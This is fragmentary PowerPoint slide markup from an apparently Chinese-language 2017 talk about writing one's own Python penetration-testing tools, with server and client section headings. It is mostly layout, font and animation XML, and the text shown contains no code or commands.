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39" r:id="rId3"/>
    <p:sldId id="267" r:id="rId5"/>
    <p:sldId id="344" r:id="rId6"/>
    <p:sldId id="410" r:id="rId7"/>
    <p:sldId id="411" r:id="rId8"/>
    <p:sldId id="412" r:id="rId9"/>
    <p:sldId id="413" r:id="rId10"/>
    <p:sldId id="439" r:id="rId11"/>
    <p:sldId id="465" r:id="rId12"/>
    <p:sldId id="409" r:id="rId13"/>
    <p:sldId id="350" r:id="rId14"/>
    <p:sldId id="466" r:id="rId15"/>
    <p:sldId id="467" r:id="rId16"/>
    <p:sldId id="468" r:id="rId17"/>
    <p:sldId id="479" r:id="rId18"/>
    <p:sldId id="480" r:id="rId19"/>
    <p:sldId id="471" r:id="rId20"/>
    <p:sldId id="472" r:id="rId21"/>
    <p:sldId id="473" r:id="rId22"/>
    <p:sldId id="474" r:id="rId23"/>
    <p:sldId id="475" r:id="rId24"/>
    <p:sldId id="478" r:id="rId25"/>
    <p:sldId id="476" r:id="rId26"/>
    <p:sldId id="477" r:id="rId27"/>
    <p:sldId id="356" r:id="rId28"/>
    <p:sldId id="481" r:id="rId29"/>
    <p:sldId id="361"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92cbf5f-b347-4348-8f30-f7baeb53de8e}">
          <p14:sldIdLst>
            <p14:sldId id="267"/>
            <p14:sldId id="344"/>
            <p14:sldId id="410"/>
            <p14:sldId id="411"/>
            <p14:sldId id="412"/>
            <p14:sldId id="413"/>
            <p14:sldId id="439"/>
            <p14:sldId id="465"/>
            <p14:sldId id="409"/>
            <p14:sldId id="350"/>
            <p14:sldId id="466"/>
            <p14:sldId id="467"/>
            <p14:sldId id="468"/>
            <p14:sldId id="479"/>
            <p14:sldId id="480"/>
            <p14:sldId id="339"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="无标题节" id="{c71197cc-898a-47b2-857d-40596918501a}">
          <p14:sldIdLst>
            <p14:sldId id="471"/>
            <p14:sldId id="472"/>
            <p14:sldId id="473"/>
            <p14:sldId id="474"/>
            <p14:sldId id="475"/>
            <p14:sldId id="476"/>
            <p14:sldId id="477"/>
            <p14:sldId id="356"/>
            <p14:sldId id="481"/>
            <p14:sldId id="361"/>
            <p14:sldId id="47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AA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583" autoAdjust="0"/>
    <p:restoredTop sz="96429" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="108" d="100"/>
          <a:sy n="108" d="100"/>
        </p:scale>
        <p:origin x="402" y="138"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2226"/>
        <p:guide pos="3892"/>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BFBD37-F6EA-4F62-AC5B-CA61076AAF6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8CC793-71B0-4598-A981-27D6583812C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8CC793-71B0-4598-A981-27D6583812C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8CC793-71B0-4598-A981-27D6583812C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8CC793-71B0-4598-A981-27D6583812C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8CC793-71B0-4598-A981-27D6583812C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8CC793-71B0-4598-A981-27D6583812C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8CC793-71B0-4598-A981-27D6583812C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8CC793-71B0-4598-A981-27D6583812C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8CC793-71B0-4598-A981-27D6583812C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8CC793-71B0-4598-A981-27D6583812C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8CC793-71B0-4598-A981-27D6583812C4}"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8CC793-71B0-4598-A981-27D6583812C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8CC793-71B0-4598-A981-27D6583812C4}"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8CC793-71B0-4598-A981-27D6583812C4}"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8CC793-71B0-4598-A981-27D6583812C4}"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8CC793-71B0-4598-A981-27D6583812C4}"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8CC793-71B0-4598-A981-27D6583812C4}"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8CC793-71B0-4598-A981-27D6583812C4}"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8CC793-71B0-4598-A981-27D6583812C4}"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8CC793-71B0-4598-A981-27D6583812C4}"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8CC793-71B0-4598-A981-27D6583812C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8CC793-71B0-4598-A981-27D6583812C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8CC793-71B0-4598-A981-27D6583812C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8CC793-71B0-4598-A981-27D6583812C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8CC793-71B0-4598-A981-27D6583812C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8CC793-71B0-4598-A981-27D6583812C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8CC793-71B0-4598-A981-27D6583812C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8CC793-71B0-4598-A981-27D6583812C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木先生iPPT01">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a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4CCED3F-793D-428A-A97D-9FEBDC8AAF99}"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67953678-DBB5-413B-AE09-240C1919F7A8}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition advClick="0"/>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木先生iPPT09">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a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4CCED3F-793D-428A-A97D-9FEBDC8AAF99}"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67953678-DBB5-413B-AE09-240C1919F7A8}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition advClick="0"/>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木先生iPPT1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a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4CCED3F-793D-428A-A97D-9FEBDC8AAF99}"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67953678-DBB5-413B-AE09-240C1919F7A8}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition advClick="0"/>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木先生iPPT02">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition advClick="0"/>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木先生iPPT04">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition advClick="0"/>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3CAE2A4A-D5BD-4EE9-9DB6-312ABAFB8A5D}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>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solidFill>
            </a:endParaRPr>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762179B3-E2C4-423B-BF94-79C355AA9075}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition advClick="0"/>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ransition advClick="0"/>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cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition advClick="0"/>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木先生iPPT0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a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4CCED3F-793D-428A-A97D-9FEBDC8AAF99}"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67953678-DBB5-413B-AE09-240C1919F7A8}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition advClick="0"/>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cSld name="木先生iPPT07">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a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4CCED3F-793D-428A-A97D-9FEBDC8AAF99}"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67953678-DBB5-413B-AE09-240C1919F7A8}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition advClick="0"/>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cSld name="木先生iPPT0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a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4CCED3F-793D-428A-A97D-9FEBDC8AAF99}"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67953678-DBB5-413B-AE09-240C1919F7A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700" advClick="0"/>
    </mc:Choice>
    <mc:Fallback>
      <p:transition advClick="0"/>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6.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advClick="0"/>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7.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image" Target="../media/image20.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><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image" Target="../media/image23.png"/><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25.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.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24.xml"/><Relationship Id="rId6"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image" Target="../media/image9.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1301750" y="2378075"/>
            <a:ext cx="9956800" cy="1310640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0" smtClean="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拒绝伸手党！</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0" smtClean="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自己手写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0" smtClean="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python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0" smtClean="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渗透小工具！</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4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1" name="矩形 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7069455" y="4884420"/>
            <a:ext cx="6445885" cy="310515"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200"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Menber  of  Xp0int</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200"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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="直接连接符 21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6900545" y="4368165"/>
            <a:ext cx="4358005" cy="63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1136355" y="629254"/>
            <a:ext cx="1919900" cy="1015663"/>
            <a:chOff x="7697" y="3250"/>
            <a:chExt cx="3023" cy="1599"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="文本框 26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7697" y="3250"/>
              <a:ext cx="807" cy="1599"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="6000" dirty="0" smtClean="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2</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6000"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8" name="文本框 27"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8435" y="3250"/>
              <a:ext cx="807" cy="1599"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="6000" dirty="0" smtClean="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0</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6000"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9" name="文本框 28"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9174" y="3250"/>
              <a:ext cx="807" cy="1599"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="6000" dirty="0" smtClean="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1</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6000"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30" name="文本框 29"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9913" y="3250"/>
              <a:ext cx="807" cy="1584"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="6000"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7</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="6000"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endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6900545" y="4549140"/>
            <a:ext cx="2136140" cy="335280"/>
            <a:chOff x="7763" y="7102"/>
            <a:chExt cx="3364" cy="528"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="矩形 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7763" y="7206"/>
              <a:ext cx="117" cy="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31" name="文本框 30"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8029" y="7102"/>
              <a:ext cx="3098" cy="528"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="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Reporter </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="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Lynn</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Thomas Greenberg - Dream for Today">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469399" y="-966704"/>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45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1250"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="8" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="45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1250"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="11" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="450"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="22"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1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4" repeatCount="indefinite" fill="hold" display="0">
                  <p:stCondLst>
                    <p:cond delay="indefinite"/>
                  </p:stCondLst>
                  <p:endCondLst>
                    <p:cond evt="onStopAudio" delay="0">
                      <p:tgtEl>
                        <p:sldTgt/>
                      </p:tgtEl>
                    </p:cond>
                  </p:endCondLst>
                </p:cTn>
                <p:tgtEl>
                  <p:spTgt spid="3"/>
                </p:tgtEl>
              </p:cMediaNode>
            </p:audio>
          </p:childTnLst>
        </p:cTn>
      </p:par>
    </p:tnLst>
    <p:bldLst>
      <p:bldP spid="20" grpId="0"/>
      <p:bldP spid="2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652780" y="1393190"/>
            <a:ext cx="4603115" cy="4454525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7151370" y="1393190"/>
            <a:ext cx="4199255" cy="3733800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="文本框 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="652769" y="391945"/>
            <a:ext cx="2595152" cy="579120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" sz="3200" b="1" dirty="0" smtClean="0">
                <a:blipFill>
                  <a:blip r:embed="rId3"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </a:blipFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务端</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="3200" b="1" dirty="0">
              <a:blipFill>
                <a:blip r:embed="rId3"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </a:blipFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8293089" y="391945"/>
            <a:ext cx="2595152" cy="579120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" sz="3200" b="1" dirty="0" smtClean="0">
                <a:blipFill>
                  <a:blip r:embed="rId3"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </a:blipFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>客户端</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="3200" b="1" dirty="0">
              <a:blipFill>
                <a:blip r:embed="rId3"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </a:blipFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1177925" y="1677035"/>
            <a:ext cx="10314305" cy="29102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35" presetClass="path" presetSubtype="0" decel="40000" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.01029 2.22222E-6 L -0.09674 2.22222E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="750" spd="-100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-5352" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="9" presetID="35" presetClass="path" presetSubtype="0" accel="40000" decel="40000" fill="hold" grpId="2" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="750"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.01094 2.22222E-6 L -2.5E-6 2.22222E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-547" y="0"/>
                                    </p:animMotion>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35" presetClass="path" presetSubtype="0" decel="40000" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.01029 2.22222E-6 L -0.09674 2.22222E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="750" spd="-100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-5352" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="15" presetID="35" presetClass="path" presetSubtype="0" accel="40000" decel="40000" fill="hold" grpId="2" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="750"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.01094 2.22222E-6 L -2.5E-6 2.22222E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-547" y="0"/>
                                    </p:animMotion>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P spid="36" grpId="2"/>
      <p:bldP spid="5" grpId="0"/>
      <p:bldP spid="5" grpId="1"/>
      <p:bldP spid="5" grpId="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59048" y="614416"/>
            <a:ext cx="4502332" cy="5806440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="25000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="25000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp useBgFill="1">
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3607711" y="294873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smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst>
                <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                  <a:prstClr val="black">
                    <a:alpha val="30000"/>
                  </a:prstClr>
                </a:innerShdw>
              </a:effectLst>
              <a:latin typeface="+mn-ea"/>
